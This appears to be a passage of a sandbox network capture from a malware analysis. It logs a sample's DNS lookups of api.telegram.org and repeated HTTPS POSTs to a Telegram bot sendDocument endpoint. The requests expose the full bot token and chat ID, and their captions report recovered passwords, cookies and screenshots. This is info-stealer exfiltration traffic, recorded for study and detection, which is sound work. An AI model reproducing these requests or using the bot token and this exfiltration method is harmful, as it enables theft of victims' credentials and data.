                                                May 18, 2024 01:39:23.488725901 CEST44349751149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:23.488795996 CEST49751443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:23.488889933 CEST44349751149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:23.633981943 CEST44349751149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:23.738217115 CEST49751443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:24.109774113 CEST44349751149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:24.110265017 CEST49751443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:24.110327005 CEST44349751149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:24.110637903 CEST44349751149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:24.111953974 CEST49751443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:24.111953974 CEST49751443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:27.678694010 CEST49752443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:27.678778887 CEST44349752149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:27.679018021 CEST49752443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:27.679343939 CEST49752443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:27.679416895 CEST44349752149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:28.771625996 CEST44349752149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:28.771852016 CEST49752443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:28.773766994 CEST49752443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:28.773821115 CEST44349752149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:28.774174929 CEST44349752149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:28.775948048 CEST49752443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:28.816200972 CEST44349752149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:29.129134893 CEST49752443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:29.129220963 CEST44349752149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:29.129431009 CEST49752443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:29.129462957 CEST44349752149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:29.129863024 CEST49752443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:29.129982948 CEST44349752149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:29.266002893 CEST49753443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:29.266006947 CEST49752443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:29.266084909 CEST44349753149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:29.266279936 CEST44349752149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:29.266346931 CEST49753443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:29.266525030 CEST49753443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:29.266556978 CEST49752443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:29.266585112 CEST44349753149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:29.566423893 CEST49754443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:29.566507101 CEST44349754149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:29.566641092 CEST49754443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:29.566956997 CEST49754443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:29.566981077 CEST44349754149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:30.410002947 CEST44349753149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:30.410187960 CEST49753443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:30.411886930 CEST49753443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:30.411938906 CEST44349753149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:30.412192106 CEST44349753149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:30.413441896 CEST49753443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:30.460108042 CEST44349753149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:30.640496969 CEST44349754149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:30.640568972 CEST49754443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:30.642040014 CEST49754443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:30.642052889 CEST44349754149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:30.642504930 CEST44349754149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:30.643656969 CEST49754443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:30.688116074 CEST44349754149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:30.769951105 CEST49753443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:30.770036936 CEST44349753149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:30.770654917 CEST49753443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:30.770750999 CEST44349753149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:30.770981073 CEST49753443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:30.771020889 CEST44349753149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:30.930491924 CEST44349753149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:30.988389015 CEST49754443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:30.988481998 CEST44349754149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:30.988938093 CEST49754443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:30.988962889 CEST44349754149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:30.989314079 CEST49754443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:30.989476919 CEST44349754149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:31.128941059 CEST49753443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:31.179101944 CEST44349754149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:31.238207102 CEST49754443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:31.398756027 CEST44349753149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:31.401936054 CEST49753443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:31.402014017 CEST44349753149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:31.402122021 CEST49753443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:31.603620052 CEST44349754149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:31.604223967 CEST49754443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:31.604273081 CEST44349754149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:31.604461908 CEST44349754149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:31.604530096 CEST49754443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:31.604530096 CEST49754443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:40.045926094 CEST49755443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:40.045968056 CEST44349755149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:40.046037912 CEST49755443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:40.046339035 CEST49755443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:40.046355963 CEST44349755149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:41.170532942 CEST44349755149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:41.170945883 CEST49755443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:41.173388004 CEST49755443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:41.173398972 CEST44349755149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:41.173803091 CEST44349755149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:41.175162077 CEST49755443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:41.216190100 CEST44349755149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:41.519629002 CEST49755443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:41.519676924 CEST44349755149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:41.519821882 CEST49755443192.168.2.4149.154.167.220
                                                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                May 18, 2024 01:35:56.250650883 CEST | 56042 | 53 | 192.168.2.4 | 1.1.1.1
                                                May 18, 2024 01:35:56.261547089 CEST | 53 | 56042 | 1.1.1.1 | 192.168.2.4
                                                May 18, 2024 01:38:36.064038038 CEST | 51963 | 53 | 192.168.2.4 | 1.1.1.1
                                                May 18, 2024 01:38:36.070816040 CEST | 53 | 51963 | 1.1.1.1 | 192.168.2.4

                                                Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                May 18, 2024 01:35:56.250650883 CEST | 192.168.2.4 | 1.1.1.1 | 0x25a4 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
                                                May 18, 2024 01:38:36.064038038 CEST | 192.168.2.4 | 1.1.1.1 | 0x3b37 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false

                                                Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                May 18, 2024 01:35:56.261547089 CEST | 1.1.1.1 | 192.168.2.4 | 0x25a4 | No error (0) | api.telegram.org |  | 149.154.167.220 | A (IP address) | IN (0x0001) | false
                                                May 18, 2024 01:38:36.070816040 CEST | 1.1.1.1 | 192.168.2.4 | 0x3b37 | No error (0) | api.telegram.org |  | 149.154.167.220 | A (IP address) | IN (0x0001) | false

                                                • api.telegram.org
                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                0 | 192.168.2.4 | 49730 | 149.154.167.220 | 443 | 6768 | C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-05-17 23:35:57 UTC | 260 | OUT | POST /bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dc76a891c5b1d3
                                                Host: api.telegram.org
                                                Content-Length: 915
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                2024-05-17 23:35:57 UTC | 915 | OUT | Data Ascii:
                                                -----------------------------8dc76a891c5b1d3
                                                Content-Disposition: form-data; name="chat_id"

                                                1165128482
                                                -----------------------------8dc76a891c5b1d3
                                                Content-Disposition: form-data; name="caption"

                                                New PW Recovered!

                                                Time: 05/17/2024 19:35:55
                                                User
                                                2024-05-17 23:35:57 UTC | 25 | IN | HTTP/1.1 100 Continue
                                                2024-05-17 23:35:58 UTC | 402 | IN | HTTP/1.1 400 Bad Request
                                                Server: nginx/1.18.0
                                                Date: Fri, 17 May 2024 23:35:58 GMT
                                                Content-Type: application/json
                                                Content-Length: 56
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":400,"description":"Logged out"}


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                1 | 192.168.2.4 | 49731 | 149.154.167.220 | 443 | 6768 | C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-05-17 23:35:59 UTC | 237 | OUT | POST /bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dc76a893006882
                                                Host: api.telegram.org
                                                Content-Length: 3951
                                                Expect: 100-continue
                                                2024-05-17 23:35:59 UTC | 1024 | OUT | Data Ascii:
                                                -----------------------------8dc76a893006882
                                                Content-Disposition: form-data; name="chat_id"

                                                1165128482
                                                -----------------------------8dc76a893006882
                                                Content-Disposition: form-data; name="caption"

                                                New CO Recovered!

                                                Time: 05/17/2024 19:35:57
                                                User
                                                2024-05-17 23:35:59 UTC | 50 | OUT | Data Ascii: -----------------------------8dc76a893006882--
                                                2024-05-17 23:35:59 UTC | 25 | IN | HTTP/1.1 100 Continue
                                                2024-05-17 23:36:00 UTC | 402 | IN | HTTP/1.1 400 Bad Request
                                                Server: nginx/1.18.0
                                                Date: Fri, 17 May 2024 23:35:59 GMT
                                                Content-Type: application/json
                                                Content-Length: 56
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":400,"description":"Logged out"}


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                2 | 192.168.2.4 | 49739 | 149.154.167.220 | 443 | 6768 | C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-05-17 23:37:43 UTC | 262 | OUT | POST /bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dc8907cde902bb
                                                Host: api.telegram.org
                                                Content-Length: 66993
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                2024-05-17 23:37:43 UTC | 1024 | OUT | Data Ascii:
                                                -----------------------------8dc8907cde902bb
                                                Content-Disposition: form-data; name="chat_id"

                                                1165128482
                                                -----------------------------8dc8907cde902bb
                                                Content-Disposition: form-data; name="caption"

                                                New SC Recovered!

                                                Time: 06/10/2024 04:42:56
                                                User
                                                2024-05-17 23:37:43 UTC | 50 | OUT | Data Ascii: -----------------------------8dc8907cde902bb--
                                                2024-05-17 23:37:43 UTC | 25 | IN | HTTP/1.1 100 Continue
                                                2024-05-17 23:37:43 UTC | 402 | IN | HTTP/1.1 400 Bad Request
                                                Server: nginx/1.18.0
                                                Date: Fri, 17 May 2024 23:37:43 GMT
                                                Content-Type: application/json
                                                Content-Length: 56
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":400,"description":"Logged out"}


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                3 | 192.168.2.4 | 49740 | 149.154.167.220 | 443 | 6768 | C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-05-17 23:38:04 UTC | 238 | OUT | POST /bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dc9221f98904f2
                                                Host: api.telegram.org
                                                Content-Length: 66995
                                                Expect: 100-continue
                                                2024-05-17 23:38:04 UTC | 1024 | OUT | Data Ascii:
                                                -----------------------------8dc9221f98904f2
                                                Content-Disposition: form-data; name="chat_id"

                                                1165128482
                                                -----------------------------8dc9221f98904f2
                                                Content-Disposition: form-data; name="caption"

                                                New SC Recovered!

                                                Time: 06/21/2024 18:32:51
                                                User
                                                2024-05-17 23:38:04 UTC | 50 | OUT | Data Ascii: -----------------------------8dc9221f98904f2--
                                                2024-05-17 23:38:04 UTC | 25 | IN | HTTP/1.1 100 Continue
                                                2024-05-17 23:38:05 UTC | 402 | IN | HTTP/1.1 400 Bad Request
                                                Server: nginx/1.18.0
                                                Date: Fri, 17 May 2024 23:38:05 GMT
                                                Content-Type: application/json
                                                Content-Length: 56
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":400,"description":"Logged out"}


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                4 | 192.168.2.4 | 49742 | 149.154.167.220 | 443 | 6768 | C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-05-17 23:38:10 UTC | 262 | OUT | POST /bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dc97bb00ca1497
                                                Host: api.telegram.org
                                                Content-Length: 66995
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                2024-05-17 23:38:11 UTC | 1024 | OUT | Data Ascii:
                                                -----------------------------8dc97bb00ca1497
                                                Content-Disposition: form-data; name="chat_id"

                                                1165128482
                                                -----------------------------8dc97bb00ca1497
                                                Content-Disposition: form-data; name="caption"

                                                New SC Recovered!

                                                Time: 06/28/2024 21:30:56
                                                User
                                                2024-05-17 23:38:11 UTC | 25 | IN | HTTP/1.1 100 Continue
                                                2024-05-17 23:38:11 UTC | 402 | IN | HTTP/1.1 400 Bad Request
                                                Server: nginx/1.18.0
                                                Date: Fri, 17 May 2024 23:38:11 GMT
                                                Content-Type: application/json
                                                Content-Length: 56
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":400,"description":"Logged out"}


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                5 | 192.168.2.4 | 49743 | 149.154.167.220 | 443 | 6768 | C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-05-17 23:38:15 UTC | 238 | OUT | POST /bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dc9b180ffd53ff
                                                Host: api.telegram.org
                                                Content-Length: 66995
                                                Expect: 100-continue
                                                2024-05-17 23:38:15 UTC | 1024 | OUT | Data Ascii:
                                                -----------------------------8dc9b180ffd53ff
                                                Content-Disposition: form-data; name="chat_id"
                                                1165128482
                                                -----------------------------8dc9b180ffd53ff
                                                Content-Disposition: form-data; name="caption"
                                                New SC Recovered!
                                                Time: 07/03/2024 04:14:35
                                                User
                                                2024-05-17 23:38:15 UTC | 25 | IN | HTTP/1.1 100 Continue
                                                2024-05-17 23:38:16 UTC | 402 | IN | HTTP/1.1 400 Bad Request
                                                Server: nginx/1.18.0
                                                Date: Fri, 17 May 2024 23:38:16 GMT
                                                Content-Type: application/json
                                                Content-Length: 56
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":400,"description":"Logged out"}


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                6 | 192.168.2.4 | 49744 | 149.154.167.220 | 443 | 6768 | C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-05-17 23:38:23 UTC | 262 | OUT | POST /bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dc9f5b252489fb
                                                Host: api.telegram.org
                                                Content-Length: 66995
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                2024-05-17 23:38:23 UTC | 25 | IN | HTTP/1.1 100 Continue
                                                2024-05-17 23:38:23 UTC | 1024 | OUT | Data Ascii:
                                                -----------------------------8dc9f5b252489fb
                                                Content-Disposition: form-data; name="chat_id"
                                                1165128482
                                                -----------------------------8dc9f5b252489fb
                                                Content-Disposition: form-data; name="caption"
                                                New SC Recovered!
                                                Time: 07/08/2024 14:14:59
                                                User
                                                2024-05-17 23:38:24 UTC | 402 | IN | HTTP/1.1 400 Bad Request
                                                Server: nginx/1.18.0
                                                Date: Fri, 17 May 2024 23:38:24 GMT
                                                Content-Type: application/json
                                                Content-Length: 56
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":400,"description":"Logged out"}


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                7 | 192.168.2.4 | 49745 | 149.154.167.220 | 443 | 6768 | C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-05-17 23:38:37 UTC | 262 | OUT | POST /bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dca59a756be172
                                                Host: api.telegram.org
                                                Content-Length: 66995
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                2024-05-17 23:38:37 UTC | 1024 | OUT | Data Ascii:
                                                -----------------------------8dca59a756be172
                                                Content-Disposition: form-data; name="chat_id"
                                                1165128482
                                                -----------------------------8dca59a756be172
                                                Content-Disposition: form-data; name="caption"
                                                New SC Recovered!
                                                Time: 07/16/2024 13:13:14
                                                User
                                                2024-05-17 23:38:37 UTC | 25 | IN | HTTP/1.1 100 Continue
                                                2024-05-17 23:38:38 UTC | 402 | IN | HTTP/1.1 400 Bad Request
                                                Server: nginx/1.18.0
                                                Date: Fri, 17 May 2024 23:38:38 GMT
                                                Content-Type: application/json
                                                Content-Length: 56
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":400,"description":"Logged out"}


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                8 | 192.168.2.4 | 49746 | 149.154.167.220 | 443 | 6768 | C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-05-17 23:38:45 UTC | 262 | OUT | POST /bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dcaa4c722ca350
                                                Host: api.telegram.org
                                                Content-Length: 66995
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                2024-05-17 23:38:46 UTC | 1024 | OUT | Data Ascii:
                                                -----------------------------8dcaa4c722ca350
                                                Content-Disposition: form-data; name="chat_id"
                                                1165128482
                                                -----------------------------8dcaa4c722ca350
                                                Content-Disposition: form-data; name="caption"
                                                New SC Recovered!
                                                Time: 07/22/2024 12:37:20
                                                User
                                                2024-05-17 23:38:46 UTC | 50 | OUT | Data Ascii: -----------------------------8dcaa4c722ca350--
                                                2024-05-17 23:38:46 UTC | 25 | IN | HTTP/1.1 100 Continue
                                                2024-05-17 23:38:46 UTC | 402 | IN | HTTP/1.1 400 Bad Request
                                                Server: nginx/1.18.0
                                                Date: Fri, 17 May 2024 23:38:46 GMT
                                                Content-Type: application/json
                                                Content-Length: 56
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":400,"description":"Logged out"}


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                9 | 192.168.2.4 | 49747 | 149.154.167.220 | 443 | 6768 | C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-05-17 23:38:49 UTC | 262 | OUT | POST /bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dcad575d0aaf1f
                                                Host: api.telegram.org
                                                Content-Length: 66995
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                2024-05-17 23:38:49 UTC | 1024 | OUT | Data Ascii:
                                                -----------------------------8dcad575d0aaf1f
                                                Content-Disposition: form-data; name="chat_id"

                                                1165128482
                                                -----------------------------8dcad575d0aaf1f
                                                Content-Disposition: form-data; name="caption"

                                                New SC Recovered!

                                                Time: 07/26/2024 09:33:10
                                                User
                                                2024-05-17 23:38:49 UTC | 50 | OUT | Data Ascii: -----------------------------8dcad575d0aaf1f--
                                                2024-05-17 23:38:50 UTC | 25 | IN | HTTP/1.1 100 Continue
                                                2024-05-17 23:38:50 UTC | 402 | IN | HTTP/1.1 400 Bad Request
                                                Server: nginx/1.18.0
                                                Date: Fri, 17 May 2024 23:38:50 GMT
                                                Content-Type: application/json
                                                Content-Length: 56
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":400,"description":"Logged out"}


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                10 | 192.168.2.4 | 49748 | 149.154.167.220 | 443 | 6768 | C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-05-17 23:38:58 UTC | 262 | OUT | POST /bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dcb1fe0d5217c4
                                                Host: api.telegram.org
                                                Content-Length: 66995
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                2024-05-17 23:38:58 UTC | 1024 | OUT | Data Ascii:
                                                -----------------------------8dcb1fe0d5217c4
                                                Content-Disposition: form-data; name="chat_id"

                                                1165128482
                                                -----------------------------8dcb1fe0d5217c4
                                                Content-Disposition: form-data; name="caption"

                                                New SC Recovered!

                                                Time: 08/01/2024 07:36:22
                                                User
                                                2024-05-17 23:38:58 UTC | 50 | OUT | Data Ascii: -----------------------------8dcb1fe0d5217c4--
                                                2024-05-17 23:38:58 UTC | 25 | IN | HTTP/1.1 100 Continue
                                                2024-05-17 23:38:59 UTC | 402 | IN | HTTP/1.1 400 Bad Request
                                                Server: nginx/1.18.0
                                                Date: Fri, 17 May 2024 23:38:59 GMT
                                                Content-Type: application/json
                                                Content-Length: 56
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":400,"description":"Logged out"}


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                11 | 192.168.2.4 | 49750 | 149.154.167.220 | 443 | 6768 | C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-05-17 23:39:05 UTC | 262 | OUT | POST /bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dcb801a5c9ddf4
                                                Host: api.telegram.org
                                                Content-Length: 67000
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                2024-05-17 23:39:05 UTC | 1024 | OUT | Data Ascii:
                                                -----------------------------8dcb801a5c9ddf4
                                                Content-Disposition: form-data; name="chat_id"

                                                1165128482
                                                -----------------------------8dcb801a5c9ddf4
                                                Content-Disposition: form-data; name="caption"

                                                New SC Recovered!

                                                Time: 08/08/2024 23:17:19
                                                User
                                                2024-05-17 23:39:05 UTC | 50 | OUT | Data Ascii: -----------------------------8dcb801a5c9ddf4--
                                                2024-05-17 23:39:06 UTC | 25 | IN | HTTP/1.1 100 Continue
                                                2024-05-17 23:39:06 UTC | 402 | IN | HTTP/1.1 400 Bad Request
                                                Server: nginx/1.18.0
                                                Date: Fri, 17 May 2024 23:39:06 GMT
                                                Content-Type: application/json
                                                Content-Length: 56
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":400,"description":"Logged out"}


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                12 | 192.168.2.4 | 49751 | 149.154.167.220 | 443 | 6768 | C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-05-17 23:39:23 UTC | 238 | OUT | POST /bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dcbf5819b9d90c
                                                Host: api.telegram.org
                                                Content-Length: 67000
                                                Expect: 100-continue
